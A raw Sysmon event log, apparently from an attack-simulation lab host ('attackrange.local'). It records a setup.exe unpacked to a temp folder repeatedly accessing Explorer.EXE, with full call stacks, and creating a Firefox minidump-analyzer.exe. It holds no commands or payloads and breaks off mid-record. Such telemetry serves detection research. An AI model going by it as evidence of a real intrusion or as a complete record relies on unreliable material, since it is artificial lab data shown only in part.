13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\minidump-analyzer.exe2021-01-18 13:59:52.411 10341000x800000000000000015037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\